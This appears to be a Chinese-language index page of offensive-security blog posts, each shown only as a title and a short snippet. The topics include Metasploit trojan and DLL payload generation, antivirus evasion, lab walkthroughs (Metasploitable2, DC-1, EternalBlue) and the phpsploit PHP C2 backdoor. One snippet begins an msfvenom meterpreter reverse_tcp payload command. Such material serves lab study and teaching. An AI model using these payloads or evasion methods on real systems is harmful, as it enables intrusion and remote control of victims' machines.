一、准备工作1、windows10 32位虚拟机作为目标靶机、kali作为攻击机 2、Immunity Debugger调试工具+mona脚本、存在漏洞版本的软件Sync Breeze Enterpr...
MSF命令大全详解
1|00x00 Payload生成1|1Windows·LinuxWindows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] l...
MSF(3)免杀混淆
声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!一、前言前面说了木马的捆绑,dll,exe,hta等密码,但是木马落地就容易被杀...
msf(2)dll文件木马
声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!一、dll文件基本概念DLL 是一种包含可由多个程序同时使用的代码和数据的库。它...
metasploit(1) 生成远控木马
声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!一、msf木马配置1、更新kali资源apt-get update #更新软件包...
免杀入门-基础篇 小白都可以看懂
怎么还比之前多了一个,多次编码好像没用了!!因为这个太老掉牙的编码已经被玩透了hh!不行,现在易容没有用了,人家检查的是灵魂~再去试试别的。大家不要紧张,说免杀感觉好难啥的,我会跟大家一起去学习!基础...
Metasploitable2-Linux: 手搓+msf提权漏洞利用
Metasploitable2-Linux 1、主机发现 首先打开靶机就是这个界面,你没看错,通常情况下你是不可能知道账户密码的,所以老老实实去做 arp-scan -l 主机探测,由于你开的靶机是n...
小迪安全2024内网靶场-VPC1 & VPC2 & VPC3
原文首发在:先知社区https://xz.aliyun.com/news/17349VPC1入口机器192.168.133.185,尝试php8.2.12漏洞利用CVE-2024-4577RCE/ph...
phpsploit:模仿MSF的php专用C2后门
GitHub - nil0x42/phpsploit :全功能C2框架,使用单行PHP后门静默地保留在Web服务器上。地址:https://github.com/nil0x42/phpsploit评注...
VulnHub靶场之DC-1超详细利用脚本漏洞与MSF后渗透
靶场的搭建设备:vm虚拟机,靶场的镜像,kali靶场的镜像我已经放在下面的百度网盘链接了,解压之后直接用vm打开就可以了链接: https://pan.baidu.com/s/1edYJckSJB5p...
记一次内网渗透实战
1项目介绍 拿shell过程我就一笔概括好了,毕竟这是主要讲的内网渗透,就是一个上传点无过滤,就这么来的,而且还是administrator权限,于是就有了这篇文章。 0x01 拿到shell后,看了...
用"永恒之蓝"漏洞渗透 Win7
文章来源:疯猫网络一、环境配置(两台主机均采用 NAT 桥接模式)1、Kali 主机的 IP 配置:2、Windows7 主机的 IP 配置:3.查看 Win7 主机打开的端口二、利用 MSF 框架对...